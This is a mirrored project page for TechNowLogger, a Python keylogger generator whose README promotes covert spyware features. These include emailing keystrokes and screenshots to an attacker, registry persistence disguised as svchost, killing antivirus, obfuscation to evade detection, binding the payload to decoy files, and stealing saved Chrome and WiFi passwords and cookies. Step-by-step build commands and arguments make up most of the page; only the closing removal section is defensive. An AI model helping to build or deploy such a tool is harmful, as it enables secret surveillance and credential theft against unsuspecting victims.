All Projects → PushpenderIndia → Technowlogger

PushpenderIndia / Technowlogger

Licence: bsd-3-clause
TechNowLogger is Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Technowlogger

Dr0p1t Framework
A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks
Stars: ✭ 1,132 (+558.14%)
Mutual labels:  persistence, kali-linux, hacking, pentest
Saint
👁 (s)AINT is a Spyware Generator for Windows systems written in Java. [Discontinued]
Stars: ✭ 522 (+203.49%)
Mutual labels:  persistence, hacking, keylogger, tool
Whatweb
Next generation web scanner
Stars: ✭ 3,503 (+1936.63%)
Mutual labels:  kali-linux, hacking, pentest
Flux Keylogger
🔖 Modern Javascript keylogger with web panel
Stars: ✭ 122 (-29.07%)
Mutual labels:  kali-linux, hacking, keylogger
Thefatrat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
Stars: ✭ 5,944 (+3355.81%)
Mutual labels:  kali-linux, hacking, tool
Xspear
Powerfull XSS Scanning and Parameter analysis tool&gem
Stars: ✭ 583 (+238.95%)
Mutual labels:  hacking, pentest, tool
Jsql Injection
jSQL Injection is a Java application for automatic SQL database injection.
Stars: ✭ 891 (+418.02%)
Mutual labels:  kali-linux, hacking, pentest
Pidrila
Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer
Stars: ✭ 125 (-27.33%)
Mutual labels:  hacking, pentest
Entropy
Entropy Toolkit is a set of tools to provide Netwave and GoAhead IP webcams attacks. Entropy Toolkit is a powerful toolkit for webcams penetration testing.
Stars: ✭ 126 (-26.74%)
Mutual labels:  kali-linux, hacking
Reconnoitre
A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
Stars: ✭ 1,824 (+960.47%)
Mutual labels:  kali-linux, hacking
Ntlmscan
scan for NTLM directories
Stars: ✭ 141 (-18.02%)
Mutual labels:  hacking, pentest
Mitmap
📡 A python program to create a fake AP and sniff data.
Stars: ✭ 1,526 (+787.21%)
Mutual labels:  kali-linux, hacking
Wprecon
WPrecon (WordPress Recon), is a vulnerability recognition tool in CMS Wordpress, developed in Go and with scripts in Lua.
Stars: ✭ 135 (-21.51%)
Mutual labels:  hacking, tool
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (-17.44%)
Mutual labels:  kali-linux, hacking
Shodan Dorks
Dorks for shodan.io. Some basic shodan dorks collected from publicly available data.
Stars: ✭ 118 (-31.4%)
Mutual labels:  hacking, pentest
Evil Winrm
The ultimate WinRM shell for hacking/pentesting
Stars: ✭ 2,251 (+1208.72%)
Mutual labels:  hacking, pentest
Sippts
Set of tools to audit SIP based VoIP Systems
Stars: ✭ 116 (-32.56%)
Mutual labels:  hacking, pentest
Quiver
Quiver is the tool to manage all of your tools for bug bounty hunting and penetration testing.
Stars: ✭ 140 (-18.6%)
Mutual labels:  kali-linux, hacking
Urlcrazy
Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage.
Stars: ✭ 150 (-12.79%)
Mutual labels:  kali-linux, hacking
Offensive Dockerfiles
Offensive tools as Dockerfiles. Lightweight & Ready to go
Stars: ✭ 150 (-12.79%)
Mutual labels:  hacking, pentest

TechNowLogger Logo

TechNowLogger

Hacker GIF

                    This small python script can do really awesome work.

TechNowLogger is Keylogger Generator for Windows/Linux, which sends key-logs & screenshot via email with other juicy target info written in Python 3.

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

  • [x] Works on Windows/Linux
  • [x] Notify New Victim Via Email
  • [x] Undetectable
  • [x] Persistence
  • [x] Sends Screenshot of Victim PC's Screen via email
  • [x] Creates Executable Binary With Zero Dependencies
  • [x] Create less size ~ 5mb payload with advance functionality
  • [x] Obfusticate the Payload before Generating it, hence Bypassing few more antivirus
  • [x] Generated Payload is Encryted with base64, hence makes extremely difficult to reverse engineer the payload
  • [x] Function to Kill Antivirus on Victim PC and tries to disable the security
  • [x] Awesome Colourful Interface to generate payload
  • [x] On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
  • [x] Distinguish Log Data on the Basics of Active Window Name (Check v1.3 Image for Better Understanding)
  • [x] Able to add custom Icon to evil file (New Argument is Added in v1.3 & onward version)
  • [x] Built-in Binder which can bind Keylogger to Any File [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service. (New Argument is Added in v1.4 & onward version)
  • [x] Checks for Already Running Instance on System, If running instance found, then only legitimate file is executed [Multiple Instance Prohibiter to avoid Same Muliple Logs Email].
  • [x] Attacker can Create/Compile for Both Windows/Linux OS Using Linux System, But Can only Create/Compile Windows Executable using Windows Machine
  • [x] Retrieves Saved Passwords from victim System and sends it to Attacker.
Built-in Stealer Can Steal These Things :
Chrome Browser (Saved Password)
WiFi (Saved Password)
Chrome Cookies (Login Data, Cookies, History)
Firefox Cookies (cookies.sqlite)

Note: Custom Stealer is Coded, does not relies on LaZagne

  • [x] Grabs & Send Useful Information of Victim's Device
These Things are Grabbed & Sended:
Operating System
Computer Name
User Name
Public IPv4
  • [x] If your payload is unable to execute, then specify --debug to run exe on foreground with CMD

Tested On

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Prerequisite

  • [x] Python 3.X
  • [x] Few External Modules

How To Use in Linux

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/technowlogger.git

# Navigate to technowlogger folder
$ cd technowlogger

# Installing dependencies
$ bash installer_linux.sh

*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
    * Click on custom install 
    * Select Path to : C:/Python37-32
    ### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x technowgen.py
$ python3 technowgen.py --help

# Making Payload/RAT
$ python3 technowgen.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How To Use in Windows

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/technowlogger.git

# Go into the repository
$ cd technowlogger

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open technowgen.py in Text editor and Configure Line 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Getting Help Menu
$ python technowgen.py --help

# Making Payload/RAT
$ python technowgen.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How to Update

  • Run updater.py to Update Autmatically or Download the latest Zip from this GitHub repo
  • Note: Git Must be Installed in order to use updater.py

Note:- Evil File will be saved inside dist/ folder, inside technowlogger/ folder

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
-i INTERVAL --interval INTERVAL Time between reports in seconds. default=120
-t TIME_PERSISTENT --persistence TIME_PERSISTENT Becoming Persistence After __ seconds. default=10
-w --windows Generate a Windows executable.
-l --linux Generate a Linux executable.
-s --steal-password Steal Saved Password from Victim Machine [Supported OS : Windows]
-b file.txt --bind LEGITIMATE_FILE_PATH.pdf AutoBinder : Specify Path of Legitimate file. [Supported OS : Windows]
-d --debug Payload Will Run In Foreground with CMD Window, To get Appropriate Execution Error

Note : Either -w/--windows or -l/--linux must be specified

  • Required Arguments
Short Hand Full Hand Description
--icon ICON Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
-e EMAIL --email EMAIL Email address to send reports to.
-p PASSWORD --password PASSWORD Password for the email address given in the -e argument.
-o OUT --out OUT Output file name.

New Screenshots:

Getting Help

Generating payload

Getting report

Log Data is Distinguished on The Basics of Active Window Name ~ Feature Added to v1.3 & Onward

Retrives & Sends Saved Chrome Browser's Password

  • Note: In order to use this feature, specify -s or --steal-password while creating keylogger

Retrives & Sends Saved WIFI Password

  • Note: In order to use this feature, specify -s or --steal-password while creating keylogger

Also Refer These Old Images

~Old Screenshots:

Getting Help

Running technowgen.py Script

Building Finished

When Keylogger runs, it adds Registry to become persistence

Makes copy of itself and saved it inside Roaming

Typing Random text to test Keylogger

Report 1 sended by TechNowLogger

Login facebook ~ Victim

Report 2 - Keylogs of facebook Credentials

Report 3 - With Screenshots

Debug Issues

Try to Run Offline Keylogger in order to test Offline Key logs capturing & Debug keylogger issues by running these commands:

Run test_key.py In both the modes [Compiled & Raw] and figure out whats the error

Run it like this : python test_key.py

Also Compile it like this: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

After running it, Start typing something, Result will be displayed on the Command prompt after every 10 seconds

Offline keylogger's files are present in TestKeylogger Folder

  • If payload is unable to execute on victim's system
1. Create a new payload with --debug flag
2. Run payload exe throught cmd [Don't Execute Payload By Double Clicking It]
3. It will now give more appropriate error in CMD, just put that issue in Issue Section

Removing TechNowLogger in Windows:

Method 1:

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called svchost, right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
  • Restart the System.

Method 2:

  • Run "RemoveTechnowLogger.bat" in Infected System and then restart the PC to stop the current Running Evil File.

Removing TechNowLogger in Linux:

  • Open Autostart file with any text editor, Autostart File Path: ~/.config/autostart/xinput.desktop

  • Remove these 5 lines:

       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Note: destination_file_name is that name of evil_file which you gave to your Keylogger using -o parameter

  • Reboot your system and then delete the evil file stored this this below path

  • Destination Path, where Keylogger is stored : ~/.config/xnput

Video Tutorial

Video Tutorial - Technowlogger

Contribute

  • All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.

TODO

  • [ ] Add New features
  • [ ] Contribute GUI Version

Contact

[email protected]

More Features Coming Soon...

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].